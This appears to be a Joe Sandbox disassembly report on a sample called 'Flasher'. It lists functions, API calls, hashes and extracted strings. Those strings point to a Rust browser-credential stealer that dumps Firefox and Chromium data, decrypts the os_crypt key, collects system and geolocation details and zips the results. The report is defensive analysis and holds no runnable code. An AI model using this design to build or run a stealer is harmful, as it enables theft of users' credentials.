String ID: C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs$,!_k$-NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$Must not use a decoder that has finished.$\\?\fatal runtime error: I/O error: operation failed to complete synchronously$a Display implementation returned an error unexpectedly/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs$asn$assertion failed: nsec >= 0 && nsec < NSEC_PER_SECC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\time-0.1.45\src\lib.rs$c/main.rs$called `Result::unwrap()` on an `Err` value$city$connectioncontent-dispositioncontent-encodingcontent-languagecontent-lengthcontent-locationcontent-rangecontent-security-policycontent-security-policy-report-onlycontent-typecookiedntdateetagexpectexpiresforwardedfromif-matchif-modified-sinceif-none-matchif-ra$country$entInvalidParameterCountSqlInputErrorsql$hell.exe$isp$nown$postal$powershe$root\SecurityCenter2$timezoneutc$um\decryption_core.rs$yHql_`%
API String ID: 0-790126852
Opcode ID: d05a3b469977879c1add518210cd4d69a33ef7223e2e55af47877e8ceecc8f78
Instruction ID: 4dcdd350e6dc6f55087c2559812692f6e5e237600cbf247a776db3685dd9faae
Opcode Fuzzy Hash: d05a3b469977879c1add518210cd4d69a33ef7223e2e55af47877e8ceecc8f78
Instruction Fuzzy Hash: EA937A76609FC589EB219F24D8413EC73A4FB48B88F448136DA9D9BB99DF38D265C340

Function 00007FF6D370A58C Relevance: 91.0, APIs: 23, Strings: 25, Instructions: 7049stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6D370A7E0
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6D370A90D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6D370AC4D
memmove.VCRUNTIME140 ref: 00007FF6D370ACB3
memmove.VCRUNTIME140 ref: 00007FF6D370CBF6
memmove.VCRUNTIME140 ref: 00007FF6D370CD95

Strings

%s constraint failed, xrefs: 00007FF6D3710E5A
into, xrefs: 00007FF6D3710B27
string or blob too big, xrefs: 00007FF6D3711064
cannot open savepoint - SQL statements in progress, xrefs: 00007FF6D3710D39
SELECT*FROM"%w".%s WHERE %s ORDER BY rowid, xrefs: 00007FF6D370FB0B
cannot commit transaction - SQL statements in progress, xrefs: 00007FF6D3710BFD
database table is locked: %s, xrefs: 00007FF6D3710462
ValueList, xrefs: 00007FF6D37107B8
cannot commit - no transaction is active, xrefs: 00007FF6D3710D0E
too many levels of trigger recursion, xrefs: 00007FF6D3710E10
out of, xrefs: 00007FF6D3710B2E
out of memory, xrefs: 00007FF6D371112A
cannot start a transaction within a transaction, xrefs: 00007FF6D3710D1E
cannot store %s value in %s column %s.%s, xrefs: 00007FF6D3710FEE
cannot rollback - no transaction is active, xrefs: 00007FF6D3710D07
no such savepoint: %s, xrefs: 00007FF6D3710DAB
cannot change %s wal mode from within a transaction, xrefs: 00007FF6D3710B3F
sqlite_master, xrefs: 00007FF6D370FAF0
cannot release savepoint - SQL statements in progress, xrefs: 00007FF6D3710D45
index corruption, xrefs: 00007FF6D370F701
statement aborts at %d: [%s] %s, xrefs: 00007FF6D371120A
database schema has changed, xrefs: 00007FF6D370ABBE
abort at %d in [%s]: %s, xrefs: 00007FF6D3710EE4
%z: %s, xrefs: 00007FF6D3710E7F
-- %s, xrefs: 00007FF6D3710947

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmovestrlen
String ID: %s constraint failed$%z: %s$-- %s$SELECT*FROM"%w".%s WHERE %s ORDER BY rowid$ValueList$abort at %d in [%s]: %s$cannot change %s wal mode from within a transaction$cannot commit - no transaction is active$cannot commit transaction - SQL statements in progress$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$cannot rollback - no transaction is active$cannot start a transaction within a transaction$cannot store %s value in %s column %s.%s$database schema has changed$database table is locked: %s$index corruption$into$no such savepoint: %s$out of$out of memory$sqlite_master$statement aborts at %d: [%s] %s$string or blob too big$too many levels of trigger recursion
API String ID: 3405231851-3554755949
Opcode ID: f1b5273c79bcae0a933582b0fde27c8669990e5c8a41d02dd42129342c4c25d9
Instruction ID: 6f90c5cdf9732ba4956b4dc1cc7dec8b192acbdec26f96d77de4941db11ca84f
Opcode Fuzzy Hash: f1b5273c79bcae0a933582b0fde27c8669990e5c8a41d02dd42129342c4c25d9
Instruction Fuzzy Hash: 25E3F332A09B8282EBA4CF26D15667DA7B4FF44B84F055037DE4EA7794DE39E920C704

Function 00007FF6D35229CA Relevance: 89.9, APIs: 30, Strings: 20, Instructions: 2425memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D3522A4D

Part of subcall function 00007FF6D35D2F94: memcmp.VCRUNTIME140 ref: 00007FF6D35D3013

Part of subcall function 00007FF6D3531A60: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D35016DE), ref: 00007FF6D3531BF5

Part of subcall function 00007FF6D360D459: SysFreeString.OLEAUT32 ref: 00007FF6D360D53D

HeapFree.KERNEL32 ref: 00007FF6D3522B40
HeapFree.KERNEL32 ref: 00007FF6D3523BF1
memmove.VCRUNTIME140 ref: 00007FF6D3523CD2
memmove.VCRUNTIME140 ref: 00007FF6D3523F2C
HeapFree.KERNEL32 ref: 00007FF6D3523F49
memmove.VCRUNTIME140 ref: 00007FF6D35241F6
HeapFree.KERNEL32 ref: 00007FF6D3524213
HeapFree.KERNEL32 ref: 00007FF6D35242F0
HeapFree.KERNEL32 ref: 00007FF6D35239BB

Part of subcall function 00007FF6D3532A40: memmove.VCRUNTIME140(?,?,?,00007FF6D351EDE9), ref: 00007FF6D3532A88

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D352DBE4, 00007FF6D352DC8C, 00007FF6D352DCBC
postal, xrefs: 00007FF6D35231EA
\\?\fatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 00007FF6D3525B50
connectioncontent-dispositioncontent-encodingcontent-languagecontent-lengthcontent-locationcontent-rangecontent-security-policycontent-security-policy-report-onlycontent-typecookiedntdateetagexpectexpiresforwardedfromif-matchif-modified-sinceif-none-matchif-ra, xrefs: 00007FF6D3523313, 00007FF6D352335D
SerialNu, xrefs: 00007FF6D35243FF
city, xrefs: 00007FF6D35230B9
CurrentHorizontalResolutionCurrentVerticalResolution, xrefs: 00007FF6D3523F79
um\decryption_core.rs, xrefs: 00007FF6D3525A2B
SerialNumber-NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName, xrefs: 00007FF6D35243BF
nown, xrefs: 00007FF6D35242C9
asn, xrefs: 00007FF6D3523378
nown, xrefs: 00007FF6D35244FC
powershe, xrefs: 00007FF6D352454C
timezoneutc, xrefs: 00007FF6D35234EA
isp, xrefs: 00007FF6D352332E
hell.exe, xrefs: 00007FF6D352453E
Name, xrefs: 00007FF6D3523B85
Must not use a decoder that has finished., xrefs: 00007FF6D352D47A
country, xrefs: 00007FF6D3522F98
Name, xrefs: 00007FF6D3523E32

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: Free$Heap$memmove$Stringmemcmp
String ID: CurrentHorizontalResolutionCurrentVerticalResolution$Must not use a decoder that has finished.$Name$Name$SerialNu$SerialNumber-NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$\\?\fatal runtime error: I/O error: operation failed to complete synchronously$asn$called `Result::unwrap()` on an `Err` value$city$connectioncontent-dispositioncontent-encodingcontent-languagecontent-lengthcontent-locationcontent-rangecontent-security-policycontent-security-policy-report-onlycontent-typecookiedntdateetagexpectexpiresforwardedfromif-matchif-modified-sinceif-none-matchif-ra$country$hell.exe$isp$nown$nown$postal$powershe$timezoneutc$um\decryption_core.rs
API String ID: 4157402187-1807458916
Opcode ID: afa1f8b53feb4375c0cbc07be99dfac8596dac78049520607d2594faeaee48e0
Instruction ID: 9552d0dca387ec6b6751248199f7e57bcc429ce4d1574630d10ea8504b0a290c
Opcode Fuzzy Hash: afa1f8b53feb4375c0cbc07be99dfac8596dac78049520607d2594faeaee48e0
Instruction Fuzzy Hash: 1D439E76A09BC585E7318F25D8413ECB3A4FB49788F404236DA9DABB95DF38D2A5C340

Function 00007FF6D35189DC Relevance: 86.3, APIs: 49, Strings: 7, Instructions: 2311memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D3532A40: memmove.VCRUNTIME140(?,?,?,00007FF6D351EDE9), ref: 00007FF6D3532A88

HeapFree.KERNEL32 ref: 00007FF6D3518B35
HeapFree.KERNEL32 ref: 00007FF6D3518BE0
HeapFree.KERNEL32 ref: 00007FF6D3518C02
HeapFree.KERNEL32 ref: 00007FF6D3518DB1

Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF65D
Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF670

HeapFree.KERNEL32 ref: 00007FF6D3518E5E
HeapFree.KERNEL32 ref: 00007FF6D3518E80
HeapFree.KERNEL32 ref: 00007FF6D35198B5
HeapFree.KERNEL32 ref: 00007FF6D35198D7
HeapFree.KERNEL32 ref: 00007FF6D35198F9
HeapFree.KERNEL32 ref: 00007FF6D3519AA3
HeapFree.KERNEL32 ref: 00007FF6D3519B41
HeapFree.KERNEL32 ref: 00007FF6D3519B63
HeapFree.KERNEL32 ref: 00007FF6D3519B7C

Part of subcall function 00007FF6D3531A60: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D35016DE), ref: 00007FF6D3531BF5

Part of subcall function 00007FF6D34F5553: HeapFree.KERNEL32 ref: 00007FF6D34F5582

memmove.VCRUNTIME140 ref: 00007FF6D3519DBF
HeapFree.KERNEL32 ref: 00007FF6D3519F17
HeapFree.KERNEL32 ref: 00007FF6D3519F42
HeapFree.KERNEL32 ref: 00007FF6D3519F88

Part of subcall function 00007FF6D35E20E0: memmove.VCRUNTIME140(?,-8000000000000000,?,?,00007FF6D35C5B9C), ref: 00007FF6D35E2131

memmove.VCRUNTIME140 ref: 00007FF6D351A307
HeapFree.KERNEL32 ref: 00007FF6D351A5F6
HeapFree.KERNEL32 ref: 00007FF6D351A62F
HeapFree.KERNEL32 ref: 00007FF6D351A66C
memmove.VCRUNTIME140 ref: 00007FF6D351A9E4
memmove.VCRUNTIME140 ref: 00007FF6D351AA4D
HeapFree.KERNEL32 ref: 00007FF6D351AB87

Part of subcall function 00007FF6D34F7F98: FindClose.KERNEL32 ref: 00007FF6D34F7FA4

HeapFree.KERNEL32 ref: 00007FF6D351ABA6
HeapFree.KERNEL32 ref: 00007FF6D351ABC8
HeapFree.KERNEL32 ref: 00007FF6D351AC16
HeapFree.KERNEL32 ref: 00007FF6D351AC38
HeapFree.KERNEL32 ref: 00007FF6D351AC83
HeapFree.KERNEL32 ref: 00007FF6D351ACA5
HeapFree.KERNEL32 ref: 00007FF6D351ACCA
HeapFree.KERNEL32 ref: 00007FF6D351ACEC
HeapFree.KERNEL32 ref: 00007FF6D351AD21
HeapFree.KERNEL32 ref: 00007FF6D351AD43
HeapFree.KERNEL32 ref: 00007FF6D351AD7B
HeapFree.KERNEL32 ref: 00007FF6D351AD9D
HeapFree.KERNEL32 ref: 00007FF6D351ADC4
HeapFree.KERNEL32 ref: 00007FF6D351ADE6
HeapFree.KERNEL32 ref: 00007FF6D351AE53
memmove.VCRUNTIME140 ref: 00007FF6D351B078
HeapFree.KERNEL32 ref: 00007FF6D351BA53

Part of subcall function 00007FF6D34F5616: HeapFree.KERNEL32 ref: 00007FF6D34F564A

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D351BB3F
, xrefs: 00007FF6D351AA69
6YpEmw, xrefs: 00007FF6D3519FA3
APPDATAsrc\firefox\firefox.rs, xrefs: 00007FF6D3518A07, 00007FF6D3518C1D, 00007FF6D3518E9B, 00007FF6D3519914
*, xrefs: 00007FF6D3518D30
x.crates.io-6f17d22bba15001f\hyper-0.14.25\src\body\to_bytes.rs, xrefs: 00007FF6D351908E
\...C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.5.13\src\write.rs, xrefs: 00007FF6D351A70F

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$memmove$CloseFind
String ID: $*$6YpEmw$APPDATAsrc\firefox\firefox.rs$\...C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.5.13\src\write.rs$called `Result::unwrap()` on an `Err` value$x.crates.io-6f17d22bba15001f\hyper-0.14.25\src\body\to_bytes.rs
API String ID: 1769694607-2013108120
Opcode ID: 9d9a727204980dd7c2a98780cf179ae06e8743245e9c50a643215caf88d6c941
Instruction ID: 5ffa8d4913b62712cba4c99a3154ed00e39adab6e00d65689f8b87ade5c304e5
Opcode Fuzzy Hash: 9d9a727204980dd7c2a98780cf179ae06e8743245e9c50a643215caf88d6c941
Instruction Fuzzy Hash: 98533872A09BC581E6B19F11E4413EEB3A4FB89784F444136DA8DA3B59DF3CE1A5CB40

Function 00007FF6D351BBEE Relevance: 84.6, APIs: 34, Strings: 13, Instructions: 2337memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D3532A40: memmove.VCRUNTIME140(?,?,?,00007FF6D351EDE9), ref: 00007FF6D3532A88

memmove.VCRUNTIME140 ref: 00007FF6D351BFF7
HeapFree.KERNEL32 ref: 00007FF6D351C100
HeapFree.KERNEL32 ref: 00007FF6D351C2C3

Part of subcall function 00007FF6D3531A60: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D35016DE), ref: 00007FF6D3531BF5

HeapFree.KERNEL32 ref: 00007FF6D351C33C
HeapFree.KERNEL32 ref: 00007FF6D351C353
HeapFree.KERNEL32 ref: 00007FF6D351C4C2
GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00007FF6D351C5E8
HeapFree.KERNEL32 ref: 00007FF6D351C9DA

Part of subcall function 00007FF6D35EFED0: GetProcessHeap.KERNEL32(0000000E,?,?,00007FF6D353370B,?,?,?,?), ref: 00007FF6D37388C1

HeapFree.KERNEL32 ref: 00007FF6D351CB30
memmove.VCRUNTIME140 ref: 00007FF6D351D482
memcmp.VCRUNTIME140 ref: 00007FF6D351D658
RtlFreeHeap.NTDLL ref: 00007FF6D351D690
HeapFree.KERNEL32 ref: 00007FF6D351D710
HeapFree.KERNEL32 ref: 00007FF6D351D890
HeapFree.KERNEL32 ref: 00007FF6D351E128
CloseHandle.KERNEL32 ref: 00007FF6D351E19D
HeapFree.KERNEL32 ref: 00007FF6D351E2D4
HeapFree.KERNEL32 ref: 00007FF6D351E2F6
HeapFree.KERNEL32 ref: 00007FF6D351E345

Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF65D
Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF670

HeapFree.KERNEL32 ref: 00007FF6D351E3B5
HeapFree.KERNEL32 ref: 00007FF6D351E3E4
HeapFree.KERNEL32 ref: 00007FF6D351E406

Part of subcall function 00007FF6D35E20E0: memmove.VCRUNTIME140(?,-8000000000000000,?,?,00007FF6D35C5B9C), ref: 00007FF6D35E2131

HeapFree.KERNEL32 ref: 00007FF6D351E5A6
HeapFree.KERNEL32 ref: 00007FF6D351E633
HeapFree.KERNEL32 ref: 00007FF6D351E64F
HeapFree.KERNEL32 ref: 00007FF6D351E66A

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D351EBEA, 00007FF6D351EC19
corrupt contentsUtf16ErrorInternalMalfunctionOperationAbortedDatabaseBusyDatabaseLockedReadOnlyOperationInterruptedSystemIoFailureDatabaseCorruptDiskFullCannotOpenFileLockingProtocolFailedSchemaChangedTooBigConstraintViolationTypeMismatchApiMisuseNoLargeFileSu, xrefs: 00007FF6D351D0D0
resulting value is out of range, xrefs: 00007FF6D351ED24
APPDATAsrc\firefox\firefox.rs, xrefs: 00007FF6D351E420
overflow subtracting duration from date, xrefs: 00007FF6D351ECC4
TEMPsrc\misc\sensitive_data.rs, xrefs: 00007FF6D351C36E
overflow adding duration to date, xrefs: 00007FF6D351EC6A
qlkb, xrefs: 00007FF6D351BC8B
Should have switched to stored beforehand, xrefs: 00007FF6D351ECDC, 00007FF6D351ED48
tementChangedRowsToSqlConversionFailureInvalidQueryMultipleStatementInvalidParameterCountSqlInputErrorsql, xrefs: 00007FF6D351BD4B
No file has been started, xrefs: 00007FF6D351DE1A
julian_day, xrefs: 00007FF6D351EC2B, 00007FF6D351EC85
c\index.crates.io-6f17d22bba15001f\reqwest-0.11.16\src\lib.rs, xrefs: 00007FF6D351C3C6

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: Heap$Free$memmove$Time$CloseFileHandlePreciseProcessSystemmemcmp
String ID: APPDATAsrc\firefox\firefox.rs$No file has been started$Should have switched to stored beforehand$TEMPsrc\misc\sensitive_data.rs$c\index.crates.io-6f17d22bba15001f\reqwest-0.11.16\src\lib.rs$called `Result::unwrap()` on an `Err` value$corrupt contentsUtf16ErrorInternalMalfunctionOperationAbortedDatabaseBusyDatabaseLockedReadOnlyOperationInterruptedSystemIoFailureDatabaseCorruptDiskFullCannotOpenFileLockingProtocolFailedSchemaChangedTooBigConstraintViolationTypeMismatchApiMisuseNoLargeFileSu$julian_day$overflow adding duration to date$overflow subtracting duration from date$qlkb$resulting value is out of range$tementChangedRowsToSqlConversionFailureInvalidQueryMultipleStatementInvalidParameterCountSqlInputErrorsql
API String ID: 4080725345-3226067970
Opcode ID: a7cb5f8bcd9c473ea62c638a0a4e83f1964d2fd181fe8c4c76353832d42ce174
Instruction ID: 36ef2a92b561ce2ff43d82a5b4741c80e00ec1c5779b2778cd2408384750501f
Opcode Fuzzy Hash: a7cb5f8bcd9c473ea62c638a0a4e83f1964d2fd181fe8c4c76353832d42ce174
Instruction Fuzzy Hash: 3B436F72A09BC581EB619F11E4463EEB3A4FB88784F448136DA9D93B59DF3CE1A5C700

Function 00007FF6D35266E8 Relevance: 55.2, APIs: 31, Strings: 5, Instructions: 1233memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D3526724
HeapFree.KERNEL32 ref: 00007FF6D3526754
HeapFree.KERNEL32 ref: 00007FF6D3526778
CloseHandle.KERNEL32 ref: 00007FF6D3526795
CloseHandle.KERNEL32 ref: 00007FF6D35267B2
CloseHandle.KERNEL32 ref: 00007FF6D35267CF

Strings

yHql_`%, xrefs: 00007FF6D35270AC
APPDATAsrc\firefox\firefox.rs, xrefs: 00007FF6D3527DD6
,!_k, xrefs: 00007FF6D35275FA
%APPDATA%, xrefs: 00007FF6D3527E5A
c/main.rs, xrefs: 00007FF6D3526EA9

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: CloseFreeHandleHeap
String ID: %APPDATA%$,!_k$APPDATAsrc\firefox\firefox.rs$c/main.rs$yHql_`%
API String ID: 1642312469-2003922457
Opcode ID: e9d2454bf2720e774b7628b9a17d7f842daf30fbfb7654919174eca0ff92c58b
Instruction ID: c1654fb467008c9d8b2b424b4584240fe121311d20634d89329b44366f778afb
Opcode Fuzzy Hash: e9d2454bf2720e774b7628b9a17d7f842daf30fbfb7654919174eca0ff92c58b
Instruction Fuzzy Hash: 40E27C36A05FC685EB619F25D8412EDB3A0FB48B84F448137DA5DABB99DF39D261C300

Function 00007FF6D35268E7 Relevance: 44.6, APIs: 24, Strings: 5, Instructions: 1126memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D352691F
HeapFree.KERNEL32 ref: 00007FF6D352694B
HeapFree.KERNEL32 ref: 00007FF6D352696B
HeapFree.KERNEL32 ref: 00007FF6D3526997
HeapFree.KERNEL32 ref: 00007FF6D35269B7
HeapFree.KERNEL32 ref: 00007FF6D35269E3
HeapFree.KERNEL32 ref: 00007FF6D3526A03
memmove.VCRUNTIME140 ref: 00007FF6D3526A5B
HeapFree.KERNEL32 ref: 00007FF6D3526A84

Strings

yHql_`%, xrefs: 00007FF6D35270AC
APPDATAsrc\firefox\firefox.rs, xrefs: 00007FF6D3527DD6
,!_k, xrefs: 00007FF6D35275FA
%APPDATA%, xrefs: 00007FF6D3527E5A
c/main.rs, xrefs: 00007FF6D3526EA9

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$memmove
String ID: %APPDATA%$,!_k$APPDATAsrc\firefox\firefox.rs$c/main.rs$yHql_`%
API String ID: 2650465384-2003922457
Opcode ID: aba33f35a395cb949c3a841cdce4bc99183667b051e3af8a5f42bfefac441b4a
Instruction ID: 3beb82e95c04da9afb7ac09205c2ebd1978221bff24b69b7bdeb10ae5c0ec8ba
Opcode Fuzzy Hash: aba33f35a395cb949c3a841cdce4bc99183667b051e3af8a5f42bfefac441b4a
Instruction Fuzzy Hash: CED29D76605FC689EB619F25D8412ED73A0FB88B84F048137DA5DABB99DF38D261C300

Function 00007FF6D3502B57 Relevance: 34.9, APIs: 6, Strings: 16, Instructions: 1878memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D3504D90: memmove.VCRUNTIME140 ref: 00007FF6D3504DDA

Part of subcall function 00007FF6D34F4FEE: memcmp.VCRUNTIME140 ref: 00007FF6D34F50D8
Part of subcall function 00007FF6D34F4FEE: memmove.VCRUNTIME140 ref: 00007FF6D34F5155
Part of subcall function 00007FF6D34F4FEE: memmove.VCRUNTIME140 ref: 00007FF6D34F5168

Part of subcall function 00007FF6D34F933B: HeapFree.KERNEL32 ref: 00007FF6D34F9356
Part of subcall function 00007FF6D34F933B: HeapFree.KERNEL32 ref: 00007FF6D34F9370
Part of subcall function 00007FF6D34F933B: RtlFreeHeap.NTDLL ref: 00007FF6D34F938A

Part of subcall function 00007FF6D35EFED0: GetProcessHeap.KERNEL32(0000000E,?,?,00007FF6D353370B,?,?,?,?), ref: 00007FF6D37388C1

Part of subcall function 00007FF6D3504D90: memmove.VCRUNTIME140 ref: 00007FF6D3504EAA
Part of subcall function 00007FF6D3504D90: HeapFree.KERNEL32 ref: 00007FF6D3504F10

Part of subcall function 00007FF6D34F4FEE: memmove.VCRUNTIME140 ref: 00007FF6D34F51FE
Part of subcall function 00007FF6D34F4FEE: memmove.VCRUNTIME140 ref: 00007FF6D34F524A

memmove.VCRUNTIME140 ref: 00007FF6D3504757
memmove.VCRUNTIME140 ref: 00007FF6D3504828
memmove.VCRUNTIME140 ref: 00007FF6D3504B84

Part of subcall function 00007FF6D34F3CF0: memcmp.VCRUNTIME140 ref: 00007FF6D34F3E13

memmove.VCRUNTIME140 ref: 00007FF6D3504C0D
HeapFree.KERNEL32 ref: 00007FF6D3504C8F
HeapFree.KERNEL32 ref: 00007FF6D3504CC0

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D35111F4
FALSETRUEUNKNOWN, xrefs: 00007FF6D35087C2
lid UTF-8 sequence in column nameC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rusqlite-0.28.0\src\column.rs, xrefs: 00007FF6D350F472
ingInvalidCharsetInvalidDateTimeDerConstraintFailedLifetimeErrorIncompleteNomErrordepthSqliteFailureSqliteSingleThreadedModeFromSqlConversionFailureIntegralValueOutOfRangeInvalidParameterNameInvalidPathExecuteReturnedResultsQueryReturnedNoRowsInvalidColumnInde, xrefs: 00007FF6D350E30B
LOCALAPPDATAsrc\chromium\dumper.rs, xrefs: 00007FF6D3506A12, 00007FF6D35070F6, 00007FF6D3510633
ptyNullPointerResultUnimplementedArrayItemInvalidDeserializationVariantErrorBerTypeErrorBerValueErrorInvalidLengthInvalidValuetagInvalidTagUnknownTagUnexpectedTagexpectedactualUnexpectedClassIndefiniteLengthUnexpectedConstructExpectedConstructUnexpectedInteger, xrefs: 00007FF6D3505A72
@, xrefs: 00007FF6D350A765
1", xrefs: 00007FF6D3511003
User Dat, xrefs: 00007FF6D3506923
ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName, xrefs: 00007FF6D350AA34
user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\serde_json-1.0.95\src\de.rs, xrefs: 00007FF6D35031D1
os_cryptstruct LocalStatestruct LocalState with 1 element, xrefs: 00007FF6D3511044
ghijklmnopqrstuvwxyz0123456789, xrefs: 00007FF6D350EDF8
r0", xrefs: 00007FF6D3511179
!G, xrefs: 00007FF6D3506A2A
\...C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.5.13\src\write.rs, xrefs: 00007FF6D3508044, 00007FF6D3508A7B, 00007FF6D35092F4

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove$Heap$Free$memcmp$Process
